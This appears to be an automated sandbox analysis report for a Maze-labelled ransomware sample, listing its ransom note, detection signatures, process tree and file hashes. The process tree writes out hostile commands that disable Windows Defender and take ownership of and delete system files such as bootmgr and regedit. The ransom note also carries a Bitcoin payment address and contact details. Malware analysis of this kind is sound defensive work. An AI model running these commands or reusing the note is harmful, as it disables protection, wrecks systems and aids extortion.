Overview

overview

10

Static

static

7

b53415f6_l...4J.exe

windows7_x64

10

b53415f6_l...4J.exe

windows11_x64

10

b53415f6_l...4J.exe

windows10_x64

10

Analysis

  • max time kernel
    375s
  • max time network
    1816s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    27-10-2021 09:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b53415f6_lcvDB3iF4J.exe

Score
10/10
mazediscoveryevasionexploitransomwarethemidatrojan

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\DECRYPT-FILES.TXT

Ransom Note
Ooops! All your important files are encrypted! [+] What happend to my computer? [+] All your important files are encrypted. No one can help you to restore files without our special decryptor. Backups were either encrypted or deleted. Shadow copies also removed. If you want to restore some of your files for free write to email (contact is below) and attach 2-3 encrypted files. You will receive decrypted samples. To decrypt other files you have to pay $250. [+] How do i pay? [+] Payment is accepted in Bitcoin only. Please check the current price of Bitcoin and buy some Bitcoins. And send the correct amount to the address specified at the bottom. [+] How can i contact? [+] 1.Download Tor browser (https://www.torproject.org/) 2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/) 3.Write email to us ([email protected]) If you can't use tor in your country you can write to us on our temporary email address. [+] What if i already paid? [+] Send your Bitcoin wallet ID to e-mail provided above. Attention! 1.Do not modify encrypted files. 2.Do not try decrypt your data using third party software. 3.Do not turn off your computer. Our bitcoin address: bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe Our temporary e-mail address: [email protected]
URLs

http://mail2tor2zyjdctd.onion/

Signatures

  • Maze

    Ransomware family also known as ChaCha.

    trojanransomwaremaze
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Disables Task Manager via registry modification
    evasion
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Possible privilege escalation attempt 5 IoCs
    exploit
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Modifies file permissions 1 TTPs 5 IoCs
    discovery
  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
    evasiontrojan
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe
    "C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"
    1⤵
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2800
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2960
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3448
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3680
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4072
    • C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
      "C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1352
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3280
        • C:\Windows\SysWOW64\takeown.exe
          takeown /f C:\Windows\System32
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:828
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Windows\System32 /grant Admin:F
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2304
        • C:\Windows\SysWOW64\takeown.exe
          takeown /f C:\Windows\System32\drivers
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:3160
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Windows\System32\drivers /grant Admin:F
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1468
        • C:\Windows\SysWOW64\takeown.exe
          takeown /f C:\Windows\System32\LogonUI.exe
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:368

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    MD5

    6bf0e5945fb9da68e1b03bdaed5f6f8d

    SHA1

    eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

    SHA256

    dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

    SHA512

    977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    MD5

    34cbce7a86066983ddec1c5c7316fa24

    SHA1

    a1135a1ddbfd3ae8079f7e449d7978fdb92f3bd9

    SHA256

    23bf6d99f757f6728c8c896676b0707e190e1acb80ec8758696fa3efa8d6cb42

    SHA512

    f6537a61341ef316200de61d4185d7fdf8169fa5f01446241d34dc74ffdf9edfd520c5d06d54c9df8a8d1eb0eeab53141d75c88f157b72cbcb6b7f0bdb84e769

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    MD5

    34cbce7a86066983ddec1c5c7316fa24

    SHA1

    a1135a1ddbfd3ae8079f7e449d7978fdb92f3bd9

    SHA256

    23bf6d99f757f6728c8c896676b0707e190e1acb80ec8758696fa3efa8d6cb42

    SHA512

    f6537a61341ef316200de61d4185d7fdf8169fa5f01446241d34dc74ffdf9edfd520c5d06d54c9df8a8d1eb0eeab53141d75c88f157b72cbcb6b7f0bdb84e769

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    410db825bd72d30c7a2a71422f20d6c7

    SHA1

    7b82adb070e565b536f2307f17b38bcb8f518e49

    SHA256

    47a9dc68f5e7adcc4cf34f82f819abcdf509aa86c5a1c4de9ad609f7433f930c

    SHA512

    d3ad008c08f506a4ab9d2539bb0a9445baab8d533d05e51cf68924e284974dbfab7d36154516a9095a8df0765f7114125d646822720b7b11bc79ac2ff500e098

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    12538c1a1e8f2e1297625a9a5c791fb7

    SHA1

    a72b6354c68b6a02239cda6b8067d5e4c1105273

    SHA256

    ebaff7d49ba1b2203e8a6dc2c293552729915b3f4411ac6fa2b38e3aa8652e2b

    SHA512

    35ed8f4d62e5ad4bac2063b1d4316b1a67c9eaed0d69b8d490e160b2aeadaa5edc4a6d0df8a9e3b7a2a99453c4de1f82e4febb06e2eac8650ee6ea6d8c0007af

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    12538c1a1e8f2e1297625a9a5c791fb7

    SHA1

    a72b6354c68b6a02239cda6b8067d5e4c1105273

    SHA256

    ebaff7d49ba1b2203e8a6dc2c293552729915b3f4411ac6fa2b38e3aa8652e2b

    SHA512

    35ed8f4d62e5ad4bac2063b1d4316b1a67c9eaed0d69b8d490e160b2aeadaa5edc4a6d0df8a9e3b7a2a99453c4de1f82e4febb06e2eac8650ee6ea6d8c0007af

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
    MD5

    e4f24d91d8e7290ffd6afc8aa01c6d63

    SHA1

    b552c6af33cc5a62379028687924406cba8ff74d

    SHA256

    5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb

    SHA512

    ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
    MD5

    e4f24d91d8e7290ffd6afc8aa01c6d63

    SHA1

    b552c6af33cc5a62379028687924406cba8ff74d

    SHA256

    5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb

    SHA512

    ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00

    Download Submit

  • memory/368-920-0x0000000000000000-mapping.dmp

    Download

  • memory/828-916-0x0000000000000000-mapping.dmp

    Download

  • memory/1352-159-0x0000000076E80000-0x000000007700E000-memory.dmp

    Filesize

    1.6MB

    Download

  • memory/1352-156-0x00000000009A0000-0x00000000009A1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1352-136-0x0000000000000000-mapping.dmp

    Download

  • memory/1352-169-0x0000000005C10000-0x000000000610E000-memory.dmp

    Filesize

    5.0MB

    Download

  • memory/1468-919-0x0000000000000000-mapping.dmp

    Download

  • memory/2304-917-0x0000000000000000-mapping.dmp

    Download

  • memory/2800-121-0x0000000006380000-0x0000000006381000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2800-122-0x0000000006430000-0x000000000692E000-memory.dmp

    Filesize

    5.0MB

    Download

  • memory/2800-123-0x00000000064F0000-0x00000000064F1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2800-115-0x0000000076E80000-0x000000007700E000-memory.dmp

    Filesize

    1.6MB

    Download

  • memory/2800-118-0x0000000001290000-0x0000000001291000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2800-120-0x0000000006930000-0x0000000006931000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2960-130-0x0000000002DA0000-0x0000000002DA1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2960-139-0x0000000002EC0000-0x0000000002EC1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2960-150-0x0000000004870000-0x0000000004871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2960-275-0x0000000004873000-0x0000000004874000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2960-134-0x0000000002DA0000-0x0000000002DA1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2960-254-0x000000007EA40000-0x000000007EA41000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2960-155-0x0000000004872000-0x0000000004873000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2960-192-0x0000000002DA0000-0x0000000002DA1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2960-124-0x0000000000000000-mapping.dmp

    Download

  • memory/2960-188-0x00000000081A0000-0x00000000081A1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2960-180-0x0000000007920000-0x0000000007921000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3160-918-0x0000000000000000-mapping.dmp

    Download

  • memory/3280-915-0x0000000000000000-mapping.dmp

    Download

  • memory/3448-274-0x0000000006983000-0x0000000006984000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3448-158-0x0000000006982000-0x0000000006983000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3448-126-0x0000000000000000-mapping.dmp

    Download

  • memory/3448-131-0x0000000000B70000-0x0000000000B71000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3448-135-0x0000000000B70000-0x0000000000B71000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3448-152-0x0000000006980000-0x0000000006981000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3448-195-0x0000000000B70000-0x0000000000B71000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3448-250-0x000000007F190000-0x000000007F191000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3680-273-0x0000000006C03000-0x0000000006C04000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3680-133-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3680-176-0x0000000007A50000-0x0000000007A51000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3680-125-0x0000000000000000-mapping.dmp

    Download

  • memory/3680-257-0x000000007E6E0000-0x000000007E6E1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3680-153-0x0000000006C02000-0x0000000006C03000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3680-166-0x0000000006F50000-0x0000000006F51000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3680-172-0x00000000079E0000-0x00000000079E1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3680-193-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3680-148-0x0000000006C00000-0x0000000006C01000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3680-129-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3680-143-0x0000000007240000-0x0000000007241000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3680-184-0x0000000007DA0000-0x0000000007DA1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4072-132-0x0000000000A60000-0x0000000000A61000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4072-128-0x0000000000A60000-0x0000000000A61000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4072-147-0x00000000044A0000-0x00000000044A1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4072-276-0x00000000044A3000-0x00000000044A4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4072-162-0x0000000006D90000-0x0000000006D91000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4072-154-0x00000000044A2000-0x00000000044A3000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4072-127-0x0000000000000000-mapping.dmp

    Download

  • memory/4072-194-0x0000000000A60000-0x0000000000A61000-memory.dmp

    Filesize

    4KB

    Download